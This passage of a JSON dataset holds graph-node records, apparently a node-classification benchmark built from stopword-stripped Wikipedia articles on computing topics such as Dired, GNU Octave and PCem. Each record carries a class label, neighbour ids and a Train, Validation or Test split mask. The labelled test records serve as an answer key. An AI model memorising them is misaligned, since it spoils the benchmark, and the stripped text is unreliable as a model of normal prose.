    "text": "Information_schema:information schema relational databases information schema information_schema ansi-standard set read-only views provide information tables views columns procedures database used source information databases make available non-standard commands notable exception among major database systems oracle implement information schema open-source project exists address rdbmss support information_schema include rdbmss support information_schema include",
    "neighbors": [
      5640,
      270,
      9360,
      4630,
      11030,
      5403,
      6943,
      5546,
      1579,
      9389,
      6850,
      9286,
      2901,
      8539,
      7523,
      10340,
      8683,
      7022,
      4604,
      10737,
      6780,
      9471
    ],
    "mask": "Test"
  },
  {
    "node_id": 5692,
    "label": 3,
    "text": "Arkanoid:_Revenge_of_Doh:arkanoid revenge doh arkanoid revenge doh a.k.a arkanoid 2 arcade game released taito corporation 1987 sequel arkanoid mysterious enemy known doh returned seek vengeance vaus space vessel player must take control vaus paddle overcome many challenges order destroy doh revenge doh sees player battle 34 rounds taken grand total 64 revenge doh differs predecessor introduction warp gates upon completion level break b pill caught two gates appear bottom play area either side player choose go either one gates choice affect version next level provided fire-button used laser cannons l catch c pill caught game also features new power-ups enemy types two new features bricks notched silver bricks like normal silver bricks take several hits destroy however short period time destruction regenerate full strength bricks need destroyed order complete level addition bricks move left right long sides obstructed bricks us version features entirely different layout level 1 feature entire line notched bricks colored bricks moving side side partway game player must defeat giant brain mini-boss completing 32 rounds player faces doh two forms final confrontation original statue-like incarnation creature waving tentacles break regenerate struck home versions revenge doh also featured level editor players could create levels edit replace existing levels exception two levels mini-boss doh",
    "neighbors": [
      1776,
      4690,
      6797,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 5693,
    "label": 4,
    "text": "Arne_Schönbohm:arne schönbohm arne schönbohm former chairman cyber security council germany current president german federal office information security 1995 2008 schönbohm worked eads 2008 set consulting business",
    "neighbors": [
      10600,
      9375
    ],
    "mask": "None"
  },
  {
    "node_id": 5694,
    "label": 6,
    "text": "Dired:dired dired directory editor computer program editing file system directories typically runs inside emacs text editor specialized mode though standalone versions written dired first file manager visual editor file system information first version dired written stand-alone program circa 1974 stan kugell stanford artificial intelligence laboratory sail incorporated gnu emacs earliest versions re-implemented c c++ operating systems run emacs dired displays ls-like file listing emacs buffer list navigated using standard navigation commands several emacs lisp scripts developed extend dired emacs combination tramp able access remote file systems editing files means ssh ftp telnet many protocols well capability accessing local files another user session also functions make possible rename multiple files via emacs search replace capabilities apply regular expressions marking selecting multiple files marked files operated various ways deleting renaming executing external shell command elisp function means lisp package dired-x also possible handle existing ls-like directory listings virtual dired mode also saved often using filename extension codice_1",
    "neighbors": [
      6797,
      5397,
      8993,
      9762,
      7849,
      11562,
      7983,
      7986,
      576,
      7364,
      8778,
      3675,
      10341,
      11112,
      5612,
      1007,
      5619,
      5492,
      2166,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 5695,
    "label": 9,
    "text": "Gotcha_(programming):gotcha programming programming gotcha valid construct system program programming language works documented counter-intuitive almost invites mistakes easy invoke unexpected unreasonable outcome classic gotcha c/c++ construct syntactically valid puts value codice_1 codice_2 executes codice_3 codice_2 non-zero sometimes even intended however commonly typo programmer probably meant executes codice_3 codice_2 codice_1 equal modern compilers usually generate warning encountering former construct conditional branch assignment comparison depending compiler options e.g. -wall option gcc avoid gotcha recommendation keep constants left side comparison e.g codice_8 rather codice_9 way using codice_10 instead codice_11 cause compiler error see yoda conditions many kinds gotchas detected compilers however",
    "neighbors": [
      1952,
      2045,
      8262
    ],
    "mask": "Test"
  },
  {
    "node_id": 5696,
    "label": 2,
    "text": "Dashcode:dashcode dashcode software application created apple inc. included mac os x leopard facilitates development widgets dashboard first included new macbooks shipping around time may 24 2006 part xcode developer tools dashcode version 3.0 328 included part apple xcode developer tools mac os x snow leopard dvd optional install last iteration dashcode version 3.0.5 xcode 4 still available developer account holders optional install downloads apple developers apple developer id required steve jobs mentioned dashcode new feature included leopard 2006 wwdc keynote speech although installed default part xcode installation dvds handed wwdc contain version dashcode although version number fact lower macbook build wwdc build dashcode contained several additional templates well interface functionality improvements wwdc build launched mac os x v10.4 wwdc build mac os x 10.5 leopard unusable 10.4 crashes soon startup december 20 2006 apple released public beta dashcode announcing release apple stated beta scaled back compatibility mac os x v10.4 beta expired july 15 2007 dashcode version 2.0 151 included part apple ios sdk allows creation web apps ios version safari dashcode version 3.0.2 336 installed xcode os x lion known allow local installation dashcode-created web apps ability allow ios run software layer akin mac os x dashboard runs local installation currently ios maintains separation native code web code way native applications access data internet web content ca n't accessed native applications save safari likewise web content including web apps run inside safari browser access filesystem internals ios installed operating system way native code native code software ios currently developed using xcode suite particularly iphone-centric version interface builder packaged ios sdk",
    "neighbors": [
      10755,
      6023,
      1549,
      4111,
      5784,
      10406,
      11430,
      6186,
      7983,
      8754,
      7991,
      2363,
      2365,
      2366,
      576,
      7378,
      3286,
      1623,
      7133,
      3681,
      2282,
      3691,
      3948,
      4844,
      10478,
      5619,
      7292,
      6654
    ],
    "mask": "None"
  },
  {
    "node_id": 5697,
    "label": 2,
    "text": "ZeroVM:zerovm zerovm open source light-weight virtualization sandboxing technology virtualizes single process using google native client platform since single process virtualized instead full operating system startup overhead order 5 ms. zerovm creates sandbox around single process using technology based google native client nacl sandbox ensures application executed access data host operating system safe execute untrusted code programs executed zerovm must first cross-compiled nacl platform zerovm execute nacl code compiled x86-64 platform portable native client pnacl format code executed zerovm call normal system calls initially interact host environment communication outside world takes place channels must declared program starts outside sandbox channel connected local file pipe another zerovm instance inside sandbox program sees channel file descriptor sandboxed program read/write data from/to channel know channel connected host programs compiled zerovm optionally use zerovm runtime library called zrt library aims provide program posix environment replacing parts c standard library particular zrt replaces c file input/output functions codice_1 codice_2 versions operate in-memory filesystem root filesystem provided tarball allows program see normal unix environment zrt also replaces c date time functions codice_3 give programs fixed deterministic environment fixed inputs every execution guaranteed give result even non-functional programs become deterministic restricted environment makes programs easier debug since behavior fixed zerovm integrated swift distributed object storage component openstack zerocloud middleware installed swift client make request swift containing zerovm program program executed directly storage nodes means program direct access data zerovm developed litestack israeli startup first commit codice_4 git repository added november 2011 litestack bought rackspace october 2013 zerovm participated techstars cloud 2013 incubator program got 500,000 seed funding first zerovm design summit held january 2014 university texas san antonio",
    "neighbors": [
      5378,
      6150,
      2058,
      3082,
      4238,
      8466,
      6813,
      2212,
      6438,
      295,
      10537,
      10284,
      7983,
      7349,
      7733,
      823,
      9525,
      5049,
      9655,
      2236,
      318,
      5702,
      7248,
      1362,
      7507,
      11221,
      477,
      2910,
      1513,
      3819,
      4972,
      5356,
      8439,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 5698,
    "label": 9,
    "text": "Process_substitution:process substitution computing process substitution form inter-process communication allows input output command appear file command substituted in-line file name would normally occur command shell allows programs normally accept files directly read write another program process substitution available compile-time option ksh88 1988 version korn shell bell labs bash shell provided process substitution later version 1.14 released 1994 following examples use korn shell syntax unix diff command normally accepts names two files compare one file name standard input process substitution allows compare output two programs directly diff sort file1 sort file2 codice_1 expression tells command interpreter run command make output appear file command arbitrarily complex shell command without process substitution alternatives alternatives cumbersome process substitution also used capture output would normally go file redirect input process bash syntax writing process codice_2 example using codice_3 codice_4 codice_5 commands counts lines file codice_6 compresses codice_5 one pass tee wc -l 2 bigfile gzip bigfile.gz main advantages process substitution alternatives hood process substitution two implementations systems support codice_8 unix-like systems works calling codice_9 system call returns file descriptor codice_10 new anonymous pipe creating string codice_11 substitutes command line systems without codice_8 support calls codice_13 new temporary filename create named pipe substitutes filename command line illustrate steps involved consider following simple command substitution system codice_8 support diff file1 sort file2 steps shell performs named pipes execution differs solely creation deletion pipe created codice_13 given new temporary file name removed codice_20 aspects remain process substitution limitations",
    "neighbors": [
      2786,
      6498,
      2479,
      4561,
      8499,
      5492,
      7325,
      1277
    ],
    "mask": "Test"
  },
  {
    "node_id": 5699,
    "label": 1,
    "text": "CiNii:cinii cinii bibliographic database service material japanese academic libraries especially focusing japanese works english works published japan database founded april 2005 maintained national institute informatics service searches within databases maintained nii nii electronic library service nii-els citation database japanese publications cjp well databases provided national diet library japan institutional repositories organizations database contains 15 million articles 3,600 publications typical month 2012 saw 30 million accesses 2.2 million unique visitors largest comprehensive database kind japan although database multidisciplinary largest portion queries receives humanities social sciences field perhaps cinii database covers japanese scholarly works field opposed natural formal medical sciences benefit databases database assigns unique identifier nii article id naid journal article entries different identifier nii citation id ncid 書誌id aka nacsis-cat record id used books identifiers also assigned authors books journal articles two separate series author may different identifier value example shinsaku kimoto da00432173 books 9000002393144 journal articles",
    "neighbors": [
      1443,
      8805,
      3495,
      3529,
      2282,
      588,
      589,
      10670,
      9679,
      1460,
      1236,
      2135,
      8026,
      8635,
      10717
    ],
    "mask": "None"
  },
  {
    "node_id": 5700,
    "label": 8,
    "text": "SensorThings_API:sensorthings api sensorthings api open geospatial consortium ogc standard providing open unified framework interconnect iot sensing devices data applications web open standard addressing syntactic interoperability semantic interoperability internet things complements existing iot networking protocols coap mqtt http 6lowpan above-mentioned iot networking protocols addressing ability different iot systems exchange information ogc sensorthings api addressing ability different iot systems use understand exchanged information ogc standard sensorthings api also allows easy integration existing spatial data infrastructures geographic information systems ogc sensorthings api two parts 1 part sensing 2 part ii tasking ogc sensorthings api part sensing released public comment june 18 2015 ogc technical committee tc approves start electronic vote december 3 2015 sensorthings api part sensing passed tc vote february 1 2016 official ogc standard specification published online july 26 2016 2019 sensorthings api also published united nation itu-t technical specification ogc sensorthings api part ii tasking core released public comment february 20 2018 passed tc vote june 1 2018 official ogc standard specification sensorthings api part ii tasking core published online january 8 2019 order offer better developer experience sensorthings api part ii tasking core discussion paper published online december 18th 2018 tasking core discussion paper provides 15 json examples showing sensorthings api part ii tasking core used sensorthings api designed specifically resource-constrained iot devices web developer community follows rest principles json encoding oasis odata protocol url conventions also mqtt extension allowing users/devices publish subscribe updates devices use coap addition http foundation sensorthings api data model based iso 19156 iso/ogc observations measurements defines conceptual model observations features involved sampling making observations context sensorthings features modelled things sensors i.e procedures feature interests result sensorthings api provides interoperable observation-focus view particularly useful reconcile differences heterogeneous sensing systems e.g. in-situ sensors remote sensors iot device system modelled thing thing arbitrary number location including 0 location arbitrary number datastreams including 0 datastream datastream observes one observedproperty one sensor many observations collected sensor observation observes one particular featureofinterest based model allows sensorthings accommodate heterogeneous iot devices data collected devices sensorthings api provides two main functionalities handled part two profiles sensing part tasking part sensing part provides standard way manage retrieve observations metadata heterogeneous iot sensor systems sensing part functions similar ogc sensor observation service tasking part provides standard way parameterizing also called tasking task-able iot devices sensors actuators tasking part functions similar ogc sensor planning service sensing part designed based iso/ogc observations measurements model allows iot devices applications create read update delete i.e http post get patch delete iot data metadata sensorthings service sensorthings api part sensing defines following resources sensorthings restful web service entity create read update delete standard http verbs post get patch delete addition sensing resources sensorthings api part ii tasking core defines following resources codice_12 order reduce data size transmitted network sensorthings api data array extension allows users request multiple observation entities format entities dataarray format sensorthings service returns dataarray response service groups observation entities datastream multidatastream means observation entities link datastream multidatastream aggregated one dataarray codice_13 value interoperability openiot sensorthings believe implementation sensorthing api major improvement openiot middleware give openiot standardized truly easy use interface sensor values.this complement rich semantic reasoning services simple resource based interface consistent data model mapping gives common context describe internet things efficiency sensorthings api comprehensive evaluation sensorthings api published jazayeri mohammad ali steve hl liang chih-yuan huang implementation evaluation four interoperable open standards internet things sensors 15.9 2015 24343-24373 sensorthings api demonstrated pilot project sponsored department homeland security science technology directorate dr. reginald brothers undersecretary homeland security science technology impressed ‘ state practical ’ various industry sensors integrated today using open standards remove stovepipe limitations one-off technologies. march 2016 sensorup geosensorweb lab university calgary submitted open source software project proposal eclipse foundation approved project called whiskers whiskers ogc sensorthings api framework javascript client light-weight server iot gateway devices e.g. raspberry pi beaglebone whiskers aim foster healthy open iot ecosystem opposed one dominated proprietary information silos whiskers aims make sensorthings development easy large growing world iot developers gost open source implementation sensorthings api go programming language initiated geodan contains easily deployable server software javascript client currently june 2016 development first version already downloaded deployed software installed device supporting docker go e.g windows linux mac os raspberry pi default sensor data stored postgresql database frost-server server implementation ogc sensorthings api frost-server implements entire specification including extensions written java run tomcat wildfly available docker image among many features ability use string uuid based entity ids frost-client java client library communicating sensorthings api compatible server sensorthings hcdt javascript charting library ogc sensorthings api based open source highchart library datatable front-end charting library enable developers connect datastreams ogc sensorthings api service display sensor observations charts tables dashboard widgets web applications mozilla developed node implementation ogc sensorthings api 2019 shaken fury operational experiment dhs next generation first responder program depicts scenario earthquake causing partial structural collapse hazmat leak stadium ogc sensorthings api used standard interface interconnects multiple sensors offers iot enabled real-time situational awareness oct 8th 2016 group volunteers smart citizens calgary gathered together assembled sensors installed houses formed crowd-sourced air quality sensor network data publicly available via ogc sensorthings api citizen sensing efforts increased number calgary air quality sensors 3 50 smart emission air quality monitoring project city nijmegen nl project deployed multiple air quality sensors throughout city data published open standards including ogc sensorthings api part project open source etl engine load project sensor data ogc sensorthings api dashboard provides easy-to-use client-side visualisation internet-of-things sensor data ogc sensorthings api compatible servers various types widgets arranged configured dashboard web application embedded website live demo available project page https //github.com/sensorthings-dashboard/sensorthings-dashboard gost dashboard v2 open source library custom html elements web components supporting sensorthings api elements facilitate development html applications integrating functionality data sensorthings api compatible services components developed predix-ui polymer sensorthings api provides functions similar ogc sensor observation service ogc specification approved 2005 standard specifications ogc sensor web enablement standard suite following table summarizes technical difference two specifications",
    "neighbors": [
      3907,
      2948,
      10659,
      9225,
      4107,
      8717,
      8539,
      53,
      9365,
      10486,
      1435,
      4797,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 5701,
    "label": 4,
    "text": "Anne_P._Mitchell:anne p. mitchell anne p. mitchell born april 3 1958 attorney professor law founder ceo institute social internet public policy 1988 mitchell founded early fathers rights group buffalo new york studying pre-law suny buffalo upon moving california attend stanford law school founded first fathers rights bbs ran student housing bbs later became site dadsrights.org graduating stanford mitchell opened fathers rights law practice represented fathers wishing remain involved lives children following divorce spoke publicly privately issues fathers rights need children fathers involved lives mitchell spoke invitation california judges bench beyond bench program santa clara family court services governor pete wilson focus fathers summit 1997 mitchell produced host cable show fathers parents half-hour television talk show focused concerns issues realities related becoming staying involved father thirty-six episodes fathers parents filmed 1997 shown cable television stations throughout united states 1998 mitchell closed fathers rights practice changed focus internet law anti-spam efforts joined mail abuse prevention system maps first formal anti-spam organization director legal public affairs maps mitchell led strategy first anti-spam lawsuits 2002 mitchell stepped ceo co-founder newly created habeas year later mitchell left habeas found run institute spam internet public policy isipp tenure habeas mitchell led first email deliverability summits became impetus founding isipp left habeas september 2005 mitchell founded auction aid help victims hurricane katrina enlisting donated items friends colleagues guy kawasaki béla fleck warren farrell anne fadiman eduardo sánchez sir harold evans raise 5,000 originally auction aid created using ebay giving works platform mitchell later criticized mitchell published many papers authored one ebook",
    "neighbors": [
      1472
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5702,
    "label": 3,
    "text": "PCem:pcem pcem short pc emulator ibm pc emulator windows linux specializes running old operating systems software designed ibm pc compatibles originally developed ibm pc xt emulator later emulates ibm pc compatible computers well unofficial builds pcem also available 86box includes number enhanced features including scsi new boards versions pcem v0.5 v8 removed official webpage due use mame opl2 opl3 emulation code yet licensed gpl-compatible license pcem capable emulating intel processors respective clones including amd idt cyrix intel 8088 pentium tillamook mmx/mobile mmx processors 1997 1999 recompiler added v10.1 mandatory p5 pentium cyrix processors optional i486 processors idt winchip processors yet rather fast processor needed full emulation speed intel core i5 4 gigahertz however current developer pcem main concern recompiler fast enough emulate intel pentium pro/pentium ii processors yet pcem emulates various ibm pc compatible systems/motherboards 1981 1996 includes almost ibm pc models including ibm ps/1 model 2121 ibm ps/2 model 2011 american megatrends bios clones 1989 1994 award bios systems award 286 clone award sis 496/497 award 430vx pci intel premiere/pci intel advanced/ev motherboards however unofficial builds pcem pcem-x pcem-unofficial also supports ibm pc compatible systems/motherboards 1996 2000 supports intel pentium pro/pentium ii processors pcem simulates bios cache relies processor rather system memory pcem emulate different graphic modes includes text mode hercules cga including composite modes 160x100x16 tweaked modes tandy ega vga including mode x tweaks vesa well various video apis directx 3dfx glide pcem also emulate various video cards ati mach64 gx s3 trio32/64/virge series 3dfx voodoo pcem also emulates sound cards adlib sound blaster including game blaster sound blaster pro sound blaster 16 sound blaster awe32 gravis ultrasound innovation ssi-2001 windows sound system ensoniq audiopci 64v/es1371 sound blaster pci 128 voodoo emulation also emulated since pcem v10 pcem v12 added support voodoo 2 various optimizations however shortcomings regarding voodoo emulation lack mip-mapping slightly wobbling triangles lack speed limiting wrong refresh rates almost every resolution except 640x480 60 hz pcem v11 separate recompiler added voodoo emulation making faster emulate voodoo graphics card unofficial build pcem allows use slirp/winpcap networking interface plus emulated ne2000 realtek rtl8029as ethernet cards however starting pcem v13 emulation ne2000 officially added similar virtual pc bochs qemu emulates almost versions microsoft windows windows vista including service pack 2 ms-dos freedos cp/m-86 also supported earlier versions os/2 requires hard drive formatted prior installation os/2 warp 3 warp 4.5 requires unaccelerated video card run operating systems also supported pcem versions linux supports pentium processor bsd derivatives e.g freebsd beos 5 works award sis 497 motherboard",
    "neighbors": [
      5378,
      10371,
      6150,
      2058,
      3082,
      6797,
      4238,
      8466,
      292,
      2212,
      6438,
      295,
      10537,
      7983,
      7349,
      7733,
      823,
      9525,
      5049,
      9655,
      2236,
      318,
      9151,
      5697,
      6345,
      9166,
      7248,
      1362,
      7507,
      4699,
      2910,
      1513,
      2159,
      6129,
      8561,
      8945,
      11634,
      8439,
      10363,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 5703,
    "label": 9,
    "text": "GNU_Octave:gnu octave gnu octave software featuring high-level programming language primarily intended numerical computations octave helps solving linear nonlinear problems numerically performing numerical experiments using language mostly compatible matlab may also used batch-oriented language since part gnu project free software terms gnu general public license octave one major free alternatives matlab others scilab freemat scilab however puts less emphasis bidirectional syntactic compatibility matlab octave project conceived around 1988 first intended companion chemical reactor design course real development started john w. eaton 1992 first alpha release dates back january 4 1993 february 17 1994 version 1.0 released version 4.0.0 released may 29 2015 program named octave levenspiel former professor principal author levenspiel known ability perform quick back-of-the-envelope calculations addition use desktops personal scientific computing octave used academia industry example octave used massive parallel computer pittsburgh supercomputing center find vulnerabilities related guessing social security numbers dramatic acceleration opencl cuda also possible use gpus octave language interpreted programming language structured programming language similar c supports many common c standard library functions also certain unix system calls functions however support passing arguments reference octave programs consist list function calls script syntax matrix-based provides various functions matrix operations supports various data structures allows object-oriented programming syntax similar matlab careful programming script allow run octave matlab octave made available gnu general public license may freely changed copied used program runs microsoft windows unix unix-like operating systems including macos typing tab character command line causes octave attempt complete variable function file names similar bash tab completion octave uses text cursor initial portion name complete running interactively octave saves commands typed internal buffer recalled edited octave includes limited amount support organizing data structures example see structure x elements b c integer array string respectively octave 'codice_1 'codice_2 logical operators evaluated short-circuit fashion like corresponding operators c language contrast element-by-element operators 'codice_3 'codice_4 octave includes c-like increment decrement operators 'codice_5 'codice_6 prefix postfix forms octave also augmented assignment e.g 'codice_7 octave supports limited form exception handling modelled 'codice_8 lisp general form unwind_protect block looks like general rule gnu octave recognizes termination given 'codice_9 either keyword 'codice_10 compatible matlab language specific keyword 'codice_11 consequence 'codice_8 block terminated either keyword 'codice_13 example portable keyword 'codice_10 cleanup part block always executed case exception raised body part cleanup executed immediately propagating exception outside block 'codice_8 gnu octave also supports another form exception handling compatible matlab language latter form differs 'codice_8 block two ways first exception_handling executed exception raised body second execution exception_handling exception propagated outside block unless 'codice_17 statement explicitly inserted within exception_handling code octave mechanism handling functions take unspecified number arguments without explicit upper limit specify list zero arguments use special argument codice_18 last argument list function set return number values using special return value codice_19 example also possible execute octave code directly c++ program example code snippet calling codice_20 c c++ code integrated gnu octave creating oct files using matlab compatible mex files octave built matlab compatibility mind shares many features matlab octave treats incompatibility matlab bug therefore could considered software clone infringe software copyright per lotus v. borland court case matlab scripts mathworks fileexchange repository principle compatible octave however often provided uploaded users octave compatible proper open source bsd license fileexchange terms use prohibit usage beside mathworks proprietary matlab purposeful albeit minor syntax additions many numerous matlab functions available gnu octave accessible packages octave forge functions available part either core octave forge packages listed online list unavailable functions included octave function __unimplemented.m__ unimplemented functions also listed many octave forge packages octave wiki unimplemented function called following error message shown octave comes official graphical user interface gui integrated development environment ide based qt available since octave 3.8 become default interface command line interface release octave 4.0 well-received edn contributor said octave workable gui several 3rd-party graphical front-ends also developed like toolbox coding education octave code user create gui applications examples button edit control checkboxtextboxlistbox message boxes.radiobuttons octave also packages available free packages located octave-forge available packages",
    "neighbors": [
      2050,
      1028,
      5129,
      15,
      5148,
      546,
      3618,
      5684,
      1591,
      6718,
      8258,
      8262,
      10822,
      1101,
      1112,
      3674,
      2652,
      10848,
      10851,
      9320,
      5741,
      8304,
      9330,
      11385,
      5759,
      2180,
      7301,
      4230,
      1673,
      9865,
      6797,
      7326,
      3744,
      4265,
      7341,
      2233,
      7356,
      8385,
      2242,
      5830,
      9926,
      4808,
      5833,
      8909,
      9944,
      9946,
      10971,
      7904,
      10464,
      4840,
      3817,
      7924,
      8436,
      7945,
      2317,
      7950,
      5395,
      5397,
      2332,
      10012,
      802,
      7983,
      2864,
      6962,
      823,
      5450,
      6502,
      363,
      9579,
      1394,
      5492,
      3960,
      3969,
      11654,
      3980,
      4493,
      8079,
      1939,
      2457,
      7580,
      1951,
      11680,
      8611,
      11180,
      9133,
      2481,
      5555,
      9148,
      10687,
      4042,
      462,
      2000,
      4561,
      8147,
      5588,
      2010,
      9696,
      8673,
      11239,
      5612,
      7148,
      1007,
      9714,
      3068,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 5704,
    "label": 5,
    "text": "Mobile_Application_Part:mobile application part mobile application part map ss7 protocol provides application layer various nodes gsm umts mobile core networks gprs core networks communicate order provide services users mobile application part application-layer protocol used access home location register visitor location register mobile switching center equipment identity register authentication centre short message service center serving gprs support node sgsn primary facilities provided map mobile application part specifications originally defined gsm association controlled etsi/3gpp map defined two different standards depending upon mobile network type cellular networks based ansi standards currently cdma2000 past amps is-136 cdmaone plays role map similar protocol usually called is-41 ansi-41 ansi map since 2000 maintained 3gpp2 n.s0005 since 2004 named 3gpp2 x.s0004 map transaction capabilities application part tcap user transported using 'traditional ss7 protocols ip using transport independent signalling connection control part ti-sccp using sigtran yate partial open source implementation map mobile cellular telephony networks like gsm umts ss7 application map used voice connections circuit switched cs data connections packet switched ps applications gsm/umts circuit switched interfaces mobile switching center msc transported ss7 include following also several gsm/umts ps interfaces serving gprs support node sgsn transported ss7",
    "neighbors": [
      5472,
      706,
      7811,
      9038,
      7120,
      10864,
      2802,
      7765,
      1437
    ],
    "mask": "Test"
  },
  {
    "node_id": 5705,
    "label": 2,
    "text": "RPM_Fusion:rpm fusion rpm fusion software repository providing add-on packages fedora distribution linux computer operating system born merge older repositories livna dribble freshrpms distributed software fedora either meet fedora definition free software distribution software may violate us law announced 8 november 2007 livna merged dribble freshrpms create unified repository add-on software called rpm fusion originally fedora 9 first release rpm fusion would providing add-ons however initially rpm fusion ready time livna repositories continued provide packages fedora 9 subsequently 3 november 2008 three software repositories merged rpm fusion livna ananym anvil handle damien nadé french programmer maintains rpm.livna.org livna deprecated favour rpm fusion defunct libdvdcss remains livna repository due copyright concerns dribble contains software found fedora livna meet stricter requirements dribble concentrates multimedia games emulators yet limited genres made matthias saou 2000 usage",
    "neighbors": [
      5096,
      7983,
      823
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5706,
    "label": 6,
    "text": "Locate_(Unix):locate unix codice_1 unix utility serves find files filesystems searches prebuilt database files generated codice_2 command daemon compressed using incremental encoding operates significantly faster codice_3 requires regular updating database sacrifices overall efficiency regular interrogation filesystems even user needs information absolute accuracy since database update real time significant speed improvements particularly large filesystems codice_1 first created 1982 bsd gnu findutils versions derive original implementation primary database world-readable index built unprivileged user codice_1 command also included macos codice_6 merging locate earlier codice_7 secure locate use restricted-access database showing filenames accessible user variants",
    "neighbors": [
      2432,
      515,
      9733,
      9735,
      3976,
      4750,
      5397,
      2198,
      6812,
      7847,
      4398,
      7983,
      823,
      1336,
      7356,
      965,
      8522,
      3659,
      2901,
      9946,
      6120,
      4850,
      5492,
      9204,
      6138,
      5759
    ],
    "mask": "Train"
  },
  {
    "node_id": 5707,
    "label": 7,
    "text": "SRWare_Iron:srware iron srware iron chromium-based web browser developed german company srware primarily aims eliminate usage tracking privacy-compromising functionality google chrome browser includes iron provide extra privacy compared chromium proper settings altered latter implement additional features distinguish google chrome iron first released beta version 18 september 2008 16 days google chrome initial release 26 may 2009 preview-release pre-alpha iron came linux 7 january 2010 beta version macos released 11 august 2010 microsoft updated browserchoice.eu website order include iron one possible choices recent versions iron released since gained features underlying chromium codebase including google chrome theme support user agent switcher extension system integrated adblocker improved linux support following google chrome features present iron added features include according lifehacker iron offers little available simply configuring google chrome privacy settings according others scamware scareware since developers bring non-existent issues chrome claim iron solves although srware claiming iron free opensource n't true least version 6 mid 2015 links given source code hosted rapidshare blocked uploader srware iron entirely closed source since least version 6 according lifehacker october 2014 srware iron supposedly open source n't released source years 2015 srware resumed releasing claim source code browser although stating page version source code",
    "neighbors": [
      513,
      6657,
      10756,
      9736,
      2579,
      6171,
      9757,
      7713,
      10791,
      9770,
      10284,
      559,
      4661,
      3639,
      10808,
      3643,
      9275,
      64,
      10834,
      6231,
      8281,
      6747,
      1642,
      9834,
      9841,
      115,
      9843,
      4728,
      637,
      1664,
      2182,
      10910,
      8351,
      7340,
      9394,
      9908,
      185,
      11449,
      4797,
      11466,
      7885,
      11469,
      9424,
      4310,
      2777,
      8923,
      737,
      4326,
      3320,
      6393,
      8443,
      9987,
      7943,
      278,
      7965,
      1834,
      7983,
      823,
      10057,
      11082,
      2893,
      8557,
      6528,
      1409,
      3971,
      3462,
      8584,
      7572,
      5026,
      944,
      5054,
      6086,
      4048,
      5078,
      479,
      10722,
      5605,
      487,
      8169,
      494,
      1520,
      7152,
      6133,
      5622,
      5114
    ],
    "mask": "None"
  },
  {
    "node_id": 5708,
    "label": 9,
    "text": "JerryScript:jerryscript jerryscript ultra-lightweight javascript engine internet things capable executing ecmascript 5.1 source code devices less 64 kb memory engine open sourced github june 2015 jerryscript licensed apache license 2.0 october 2016 js foundation formed jerryscript one initial projects",
    "neighbors": [
      803,
      3462,
      4011,
      9964,
      339,
      11221,
      8854,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 5709,
    "label": 6,
    "text": "CrossDOS:crossdos crossdos file system handler accessing fat formatted media amiga computers bundled amigaos 2.1 later function allow working disks formatted pcs atari sts others 1990s became commonly used method file exchange amiga systems platforms crossdos supported double density 720 kb high density 1.44 mb floppy disks compatible disk drives amigados disk handling allowed automatic disk-change detection fat formatted floppy disks file system also used hard disks media crossdos provided hard disk configuration software however versions crossdos bundled amigaos support long filenames extension fat introduced microsoft windows 95 crossdos originally developed stand-alone commercial product consultron available amigaos 1.2 1.3 1992 commodore included version crossdos amigaos 2.1 later versions users could work pc formatted disks fact bundled version also work version 2.0 amigaos bundled crossdos replaced obscure tool earlier versions amigaos could access fat formatted disks secondary floppy disk drive tool complete file system user program read files fat formatted disk development crossdos continued bundled os crossdos 7 last version released included support long filenames features available bundled version",
    "neighbors": [
      1801,
      139,
      5264,
      2193,
      9236,
      3233,
      9249,
      9762,
      8618,
      5293,
      6062,
      7983,
      432,
      8369,
      8115,
      6075,
      11076,
      10570,
      1742,
      850,
      4564,
      6233,
      2395,
      5729,
      5736,
      11370,
      5743,
      6129,
      11123,
      9848
    ],
    "mask": "None"
  },
  {
    "node_id": 5710,
    "label": 2,
    "text": "Kernel_Normal_Form:kernel normal form kernel normal form knf coding style used development code bsd operating systems based original knf concept computer systems research group dictates programming style contributed code adhere prior inclusion codebase knf started codification ken thompson dennis ritchie formatted original unix c source code describes things name variables use indents use ansi c k r c code styles bsd variant knf rules evolved time differ small ways sunos kernel userland also uses similar indentation style derived style documents sometimes known bill joy normal form correctness indentation list source files verified style checker program written bill shannon style checker program called cstyle",
    "neighbors": [
      1927,
      274,
      9625,
      1946,
      4636,
      2212,
      10535,
      1839,
      11698,
      11573,
      1718,
      5177,
      443,
      5819,
      11459,
      8266,
      8395,
      7249,
      850,
      10455,
      6361,
      9306,
      4571,
      6491,
      7521,
      1891,
      7139,
      1637,
      998,
      4073,
      9201,
      3058,
      7027,
      9844,
      2421,
      2424,
      1273,
      2045,
      9343
    ],
    "mask": "Test"
  },
  {
    "node_id": 5711,
    "label": 3,
    "text": "Applix_1616:applix 1616 applix 1616 kit computer motorola 68000 cpu produced small company called applix sydney australia 1986 early 1990s ran custom multitasking multiuser operating system resident rom version minix also ported 1616 mgr window system andrew morton designer 1616 one founders applix later became maintainer 2.6 version linux kernel paul berger andrew morton formed australian company applix pty ltd. approximately 1984 sell z80 card developed apple iic allowed run cp/m product commercial success paul later proposed develop motorola 68000-based personal computer sale kit form project presented jon fairall editor australia new zealand electronics magazine electronics today international december 1986 first four construction articles published project 1616 series concluding june 1987 october november 1987 disk controller card also published project 1617 next decade 400 1616s sold applix pty ltd. way related north american company name produced applixware main board contains main board also four 80-pin expansion slots 1616 shared backplane platform developed andrew morton keno computer systems allowing 1616 use expansion boards developed keno computer systems platform primarily 34010 graphics coprocessor although form-factor different left kcs cards sticking top 1616 case disk controller card contains coprocessor able run zrdos cp/m clone act smart disk controller memory card tms34010 card developed andrew morton keno computer systems 34010 bit-addressable graphics processor instructions two-dimensional graphics primitives arbitrary width arithmetic operations pixel data one-off interface cards developed specific projects including numerically controlled sheet metal spinning machine controller several eeprom programmers etc 1616/os initially little powerful monitor commands dumping modifying memory loading saving tape built macro assembler full screen editor time operating system gained hierarchical file system preemptive multitasking support multiple users access controls although memory protection lightweight threads message passing primitives pipes ultimately operating system around 250 system calls 78 commands built shell operating system enough similarity unix porting unix source 1616/os relatively painless colin mccormack ported minix 1616 worked around lack memory management unit fork ing copying bss heap stack 